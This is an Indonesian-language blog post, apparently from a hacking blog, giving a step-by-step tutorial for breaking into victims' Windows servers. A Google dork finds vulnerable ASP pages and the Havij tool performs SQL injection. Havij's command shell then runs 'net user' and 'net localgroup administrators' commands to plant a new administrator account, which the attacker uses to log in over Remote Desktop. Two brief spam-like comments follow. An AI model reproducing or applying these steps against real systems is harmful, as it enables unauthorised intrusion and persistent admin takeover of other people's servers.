Postingan
tidak selalu kita mengendalikan web dengan Shell entah b374k atau lotus,atau apapun nama shellnya,kita juga bisa memanfaatkan fitur bawaan windows yaitu Remote Desktop,hanya saja kita tetep harus tahu Username dan Password untuk bisa mengakses server korban
untuk teman-teman yang belum tau apa sihh REMOTE DEKSTOP itu ..
silahkan googling dulu ., biar usaha dikit ..
ok langsung ke tutorialnya aja ..
Bila kita melakukan tehnik Sql Injection dan mendapatkan username dan password korban belum tentu itu sama untuk login ke komputer,lha terus mesti gimana??kita bisa memanfaatkan Havij untuk itu ..
step by stepnya :
- Dork inurl:/*.asp?id=
- TOOLS HAVIJ
- TOOLS HAVIJ
1. ane anggap teman2 dah punya sebuah target yang di scan menggunakan havij ( table sudah terbuka )
2. jika sudah ., silahkan teman2 pilik icon CMD SHELL kemudian pilih "net user (nama login kesukaan) ( password) /add" dan kita klik "execute"
![[Image: sshot-1.png]](http://2.bp.blogspot.com/-nGWfHgm1qpI/T0YK28L-XYI/AAAAAAAAAWo/vm1aZfJlvTA/s640/sshot-1.png)
3. setelah selesai kita pilih "net localgroup administrators (nama login kesukaan) /add" dan klik lagi "execute"
Spoiler: pict 2
4. CROTTTZ .. CARA PERTAMA DONE !!
lanjut., kita buka fasilitas windows nya , dengan cara start -> all programa -> accessories -> remote desktop
![[Image: sshot-4.png]](http://1.bp.blogspot.com/-K3S0iteKCmA/T0YLBQnUJ3I/AAAAAAAAAXA/x5QdGg3n-C0/s400/sshot-4.png)
5. masukkan username dan password yang udah kita buat tadi...
![[Image: sshot-5.png]](http://3.bp.blogspot.com/-8j-qb_ig_5Q/T0YLD1IntjI/AAAAAAAAAXI/9G7mnCXwcsY/s1600/sshot-5.png)
6. dan akhirnya kita telah ada di server korban ..
![[Image: sshot-3.png]](http://3.bp.blogspot.com/-nkRhs5MJmO0/T0YK-NdzSDI/AAAAAAAAAW4/5hjbsUup8rw/s640/sshot-3.png)
Sekian Dan Terima Kasih :)
ayam sabung taji
BalasHapusr
Thanx beautiful nice much
BalasHapus